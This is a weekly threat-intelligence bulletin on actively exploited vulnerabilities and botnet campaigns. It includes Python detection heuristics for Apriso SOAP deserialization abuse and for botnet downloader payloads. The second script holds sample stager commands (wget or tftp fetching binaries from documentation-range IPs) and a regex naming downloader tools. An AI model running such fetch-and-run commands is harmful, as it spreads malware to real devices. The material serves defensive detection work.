Executive Summary
This week's cybersecurity landscape has been marked by continued exploitation of critical vulnerabilities across enterprise and consumer technologies. A deserialization vulnerability in Dassault Systèmes DELMIA Apriso, which was actively exploited last week, has now been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring the persistent risks facing industrial environments. Meanwhile, a command injection flaw in SAP S/4HANA has entered the spotlight after being confirmed under active exploitation, raising major concerns for organizations running both on-premises and cloud deployments.
The TP-Link router vulnerabilities, the Linux kernel TOCTOU flaw, and the WhatsApp vulnerability that were added to the CISA KEV catalog last week also continue to trend, signaling that attackers remain focused on weaponizing them in the wild.
Botnet activity is on the rise, with EnemyBot, Sysrv-k, Andoryu, and Androxgh0st exploiting weaknesses in GitLab, cloud gateways, and PHP-based applications. At the same time, IoT-focused botnets like Mirai, Bashlite, Tsunami, and BrickerBot have intensified attacks on EirD1000 routers, aiming to establish persistence and enable lateral movement.
Adding to the wave of threat activity, 360NetLab reported that multiple groups are exploiting a vulnerability in LILIN DVRs to spread botnets including Chalubo, FBot and Moobot. Meanwhile, the Australian Cyber Security Centre (ACSC) issued an alert on the active exploitation of a SonicWall vulnerability directly tied to Akira ransomware intrusions against Australian organizations.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping security teams make informed decisions.
CVE-2025-5086
A Deserialization of Untrusted Data vulnerability has been identified in DELMIA Apriso, affecting releases from 2020 through 2025 and carrying a critical CVSS score of 9.0. Dassault Systèmes issued an advisory in June 2025, warning that the flaw could enable remote code execution in Apriso’s Manufacturing Operation Management (MOM) and Manufacturing Execution System (MES) platforms, which form the backbone of many industrial environments. Recently, researchers at SANS.edu have observed active exploitation attempts traced to IP 156.244.33(.)162. The attacks use SOAP POST requests targeting /apriso/WebServices/FlexNetOperationsService.svc/Invoke, embedding malicious objects in XML that decode into Windows executables. Organizations are strongly urged to apply the available patches, monitor for suspicious SOAP traffic and Base64 payloads, and restrict internet exposure of MOM/MES systems to reduce risk. The vulnerability has also been added to the CISA KEV catalog, underscoring its active exploitation and critical nature.
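The detection guidance above (watch for SOAP POSTs to the Invoke endpoint carrying Base64 blobs that decode to Windows executables) can be turned into a simple log-triage heuristic. The following Python is an added example written for this report, not code from SANS.edu, Dassault Systèmes or CISA; the record field names (src_ip, method, path, body) and the sample requests are constructed assumptions, and the "executable" is only an MZ header stub, not a real binary.

```python
"""Heuristic triage of SOAP Invoke requests for CVE-2025-5086-style abuse (added example)."""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Endpoint named in the SANS.edu observation quoted in the report.
APRISO_INVOKE_PATH = "/apriso/WebServices/FlexNetOperationsService.svc/Invoke"

# Long runs of Base64-alphabet characters; the 40-character floor keeps ordinary
# identifiers and short tokens from being decoded and inspected.
B64_CANDIDATE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Constructed stand-in for a Windows executable: just the 'MZ' DOS header
# bytes followed by zero padding. It is not a runnable binary.
FAKE_PE_STUB = b"MZ\x90\x00" + b"\x00" * 44


def soap_body(payload_b64: str) -> str:
    """Wrap a Base64 blob in a minimal SOAP envelope (constructed sample)."""
    return (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
        f"<s:Body><Invoke><data>{payload_b64}</data></Invoke></s:Body></s:Envelope>"
    )


# Hypothetical proxy/sensor records. Field names are an assumption of this
# example and all values are constructed (documentation IP ranges).
SAMPLE_REQUESTS: List[Dict[str, str]] = [
    {"src_ip": "203.0.113.5", "method": "GET",
     "path": "/apriso/Login.aspx", "body": ""},
    {"src_ip": "198.51.100.7", "method": "POST",
     "path": APRISO_INVOKE_PATH,
     "body": soap_body(base64.b64encode(FAKE_PE_STUB).decode())},
    {"src_ip": "198.51.100.9", "method": "POST",
     "path": APRISO_INVOKE_PATH,
     "body": soap_body(base64.b64encode(b"hello " * 10).decode())},
]


def decoded_blobs(body: str) -> List[bytes]:
    """Return every Base64 candidate in the body that decodes cleanly."""
    blobs: List[bytes] = []
    for match in B64_CANDIDATE.finditer(body):
        try:
            blobs.append(base64.b64decode(match.group(0), validate=True))
        except binascii.Error:
            continue  # not valid Base64 (bad length or padding); ignore
    return blobs


def analyze_request(req: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding for suspicious Invoke traffic, or None for benign requests."""
    if req["method"].upper() != "POST":
        return None
    if not req["path"].lower().endswith(APRISO_INVOKE_PATH.lower()):
        return None
    blobs = decoded_blobs(req["body"])
    # Decoded content starting with the DOS 'MZ' magic is a PE image: the
    # pattern the report describes for this exploitation wave.
    if any(blob.startswith(b"MZ") for blob in blobs):
        return {"src_ip": req["src_ip"], "severity": "high",
                "reason": "Base64 blob in SOAP Invoke decodes to a PE (MZ) header"}
    if blobs:
        return {"src_ip": req["src_ip"], "severity": "medium",
                "reason": "Base64 blob embedded in SOAP Invoke request"}
    return None


def scan(requests: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run the heuristic over a batch of records and keep only the findings."""
    return [f for f in (analyze_request(r) for r in requests) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

The MZ check is deliberately narrow: a "medium" finding for any Base64 blob on this endpoint gives analysts a broader net for deserialization gadget chains that do not embed a full executable, while the "high" tier is reserved for the behaviour the advisory describes.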
CVE-2025-9377
An OS Command Injection vulnerability has been identified in the TP-Link Archer C7(EU) V2 and TL-WR841N/ND(MS) V9 routers, specifically within the Parental Control page. The flaw affects firmware versions released before 241108, allowing attackers to potentially inject and execute malicious commands. While TP-Link issued patched firmware for these models, both devices have since reached end-of-life (EoL), meaning they will no longer receive long-term support or security updates beyond the available fix. Users are therefore strongly encouraged to migrate to newer hardware that ensures ongoing protection and performance. For those unable to upgrade immediately, TP-Link recommends applying the patched firmware, restoring the router, and disabling remote management in favor of the official Tether app. The flaw has also been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, highlighting its active exploitation risk.
CVE-2025-38352
A TOCTOU (Time-of-Check Time-of-Use) race condition vulnerability has been discovered in the Linux kernel's POSIX CPU timers subsystem. This issue occurs when a non-autoreaping task, during its exit process, triggers a race between handle_posix_cpu_timers() and posix_cpu_timer_del(), potentially leading to missed timer detections, unstable task cleanup, and overall system instability. Google addressed the issue in its Android security updates by introducing exit_state validation to mitigate the flaw. Actively exploited as a zero-day in limited, targeted attacks, this kernel-level vulnerability has also been added to the CISA KEV catalog, underscoring its severity and ongoing risk.
CVE-2025-42957
A Command Injection vulnerability in SAP S/4HANA (affecting both on-premises and private cloud editions) is now under active exploitation. Though SAP released a patch on August 11, 2025 to resolve this vulnerability, unpatched systems remain exposed to severe risk. Successful exploitation allows attackers with only low-level user credentials and the S_DMIS authorization with activity 02 to abuse an RFC-exposed function module, requiring no user interaction. A compromise could grant adversaries full control of the SAP environment, including altering the database, creating SAP_ALL privileged superuser accounts, extracting password hashes, and disrupting essential business processes, thereby undermining confidentiality, integrity, and availability. SecurityBridge Threat Research Labs has confirmed recent exploitation attempts, while Pathlock has reported detecting suspicious activity consistent with this vulnerability, warning that an exploit is actively circulating and that organizations without the August 2025 security updates face heightened risk.
CVE-2025-55177
An Incorrect Authorization vulnerability in WhatsApp has been identified, allowing an unrelated user to force a target’s device into processing content from a malicious URL. The flaw impacted WhatsApp for iOS (prior to v2.25.21.73), WhatsApp Business for iOS (v2.25.21.78), and WhatsApp for Mac (v2.25.21.78) before being patched by the company, which has also begun issuing security notifications to individuals believed to have been targeted over the past three months. Although serious on its own, the risk was amplified when combined with Apple’s CVE-2025-43300, an out-of-bounds write vulnerability in the Image I/O framework affecting iOS, iPadOS, and macOS. This exploit chain enabled a sophisticated “zero-click” attack, requiring no user interaction, that has reportedly impacted both iPhone and Android users, including journalists and human rights defenders, highlighting the persistent risks posed by government spyware. The flaw has since been added to the CISA KEV catalog.
CVE-2023-50224
An Authentication Bypass by Spoofing vulnerability has been identified in the TP-Link TL-WR841N router, specifically within the httpd service that listens on TCP port 80. The flaw enables network-adjacent attackers to access sensitive information, including stored credentials, without authentication. Once compromised, these credentials can provide attackers with a pathway to further infiltrate the device and connected systems. As the affected products have already reached end-of-life (EoL) and will not receive security updates, users are strongly advised to replace them with supported hardware. This vulnerability has also recently been added to the CISA KEV catalog, underscoring its exploitation risk.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. Presented below are the top 5 CVEs with payloads suggestive of botnet activity, such as those invoking wget with bare IP addresses.
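The ranking criterion above (payloads that fetch a stage from a literal IP address with wget or a similar downloader) can be expressed as a small classifier over sensor hits. The Python below is an added example written for this report, not Loginsoft's or MISP's own tooling; the regular expression, the (cve, payload) record shape and the sample hits are this example's assumptions, with placeholder CVE identifiers and documentation IP ranges rather than real indicators.

```python
"""Rank CVEs by botnet-style payloads: downloader commands pointed at a bare IPv4 address (added example)."""
import re
from collections import Counter
from typing import List, Optional, Tuple

# Downloader invocations that reference a literal IPv4 address rather than a
# hostname, a habit typical of botnet stagers. The pattern stops at command
# separators so one shell one-liner does not bleed into the next command.
BOTNET_FETCH = re.compile(
    r"\b(?:wget|curl|tftp|ftpget)\b[^;&|\n]*?(?:https?://|\s)"
    r"((?:\d{1,3}\.){3}\d{1,3})",
    re.IGNORECASE,
)

# Constructed sensor hits: (CVE the signature matched, decoded request payload).
# CVE identifiers are placeholders, not the report's real top-5 list.
SAMPLE_HITS: List[Tuple[str, str]] = [
    ("CVE-TEST-0001", "cd /tmp; wget http://192.0.2.10/x.sh"),
    ("CVE-TEST-0001", "curl -O http://192.0.2.10/x.sh"),
    ("CVE-TEST-0002", "tftp 192.0.2.11 -c get bot.arm"),
    ("CVE-TEST-0002", "wget http://updates.example.net/patch.tar.gz"),  # hostname, not an IP
    ("CVE-TEST-0003", "id;uname -a"),
    ("CVE-TEST-0003", "wget http://198.51.100.4/b"),
    ("CVE-TEST-0004", "SELECT 1 FROM dual"),
    ("CVE-TEST-0005", "curl http://192.0.2.12/s"),
    ("CVE-TEST-0006", "ping -c 1 203.0.113.1"),  # IP present, but no downloader
]


def fetch_ip(payload: str) -> Optional[str]:
    """Return the IPv4 address a downloader command points at, or None."""
    match = BOTNET_FETCH.search(payload)
    return match.group(1) if match else None


def looks_like_botnet(payload: str) -> bool:
    """True when the payload fetches a stage from a literal IP address."""
    return fetch_ip(payload) is not None


def top_botnet_cves(hits: List[Tuple[str, str]], n: int = 5) -> List[Tuple[str, int]]:
    """Count botnet-style payloads per CVE and return the n most frequent."""
    counts = Counter(cve for cve, payload in hits if looks_like_botnet(payload))
    return counts.most_common(n)


def staging_hosts(hits: List[Tuple[str, str]]) -> List[str]:
    """Distinct IPs used as download sources, in first-seen order (for blocklisting/enrichment)."""
    seen: List[str] = []
    for _, payload in hits:
        ip = fetch_ip(payload)
        if ip and ip not in seen:
            seen.append(ip)
    return seen


if __name__ == "__main__":
    for cve, count in top_botnet_cves(SAMPLE_HITS):
        print(f"{cve}: {count} botnet-style payload(s)")
    print("staging hosts:", staging_hosts(SAMPLE_HITS))
```

Hits whose payload names a hostname rather than an IP, or that merely contain an IP without a downloader, are excluded on purpose: the point of the heuristic is the hard-coded staging address, which is what distinguishes opportunistic botnet traffic from ordinary scanner probes.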
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
CVE-2025-34130
360Netlab reported that since August 2019, its unknown threat detection system has observed multiple groups exploiting a zero-day vulnerability in LILIN DVRs to distribute botnets such as Chalubo, FBot, and Moobot. The exploited vulnerability is an arbitrary file read issue in /z/zbin/net_html.cgi. In February 2020, the manufacturer addressed the issue and released firmware 2.0b60_20200207 to patch the vulnerabilities. These findings underscore how unpatched or poorly secured IoT devices can become a persistent attack vector, fueling botnet operations for years.
CVE-2024-40766
The Australian Cyber Security Centre (ACSC) has issued an alert regarding the active exploitation of CVE-2024-40766, a critical vulnerability in SonicWall SSL VPNs that has been directly linked to Akira ransomware intrusions against Australian organizations. The flaw affects Gen 5, Gen 6, and Gen 7 SonicWall devices running vulnerable SonicOS versions, and successful exploitation can grant attackers unauthorized access to corporate networks or even crash the firewall, escalating the impact. According to the ACSC, threat actors are actively leveraging this weakness, with Akira ransomware groups increasingly using VPN vulnerabilities as entry points. Accordingly, the agency is urging all organizations to immediately patch their devices, stressing that the latest security builds are available for download via mysonicwall.com.
PRE-NVD observed for this week
Pre-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/09/11/cisa-adds-one-known-exploited-vulnerability-catalog
- https://securitybridge.com/blog/critical-sap-s-4hana-code-injection-vulnerability-cve-2025-42957/
- https://pathlock.com/blog/security-alerts/cve-2025-42957-critical-sap-s-4hana-code-injection-vulnerability/
- https://www.cisa.gov/news-events/alerts/2025/09/03/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://blog.netlab.360.com/multiple-botnets-are-spreading-using-lilin-dvr-0-day/
- https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/ongoing-active-exploitation-of-sonicwall-ssl-vpns-in-australia
- https://source.android.com/docs/security/bulletin/2025-09-01
- https://www.whatsapp.com/security/advisories/2025?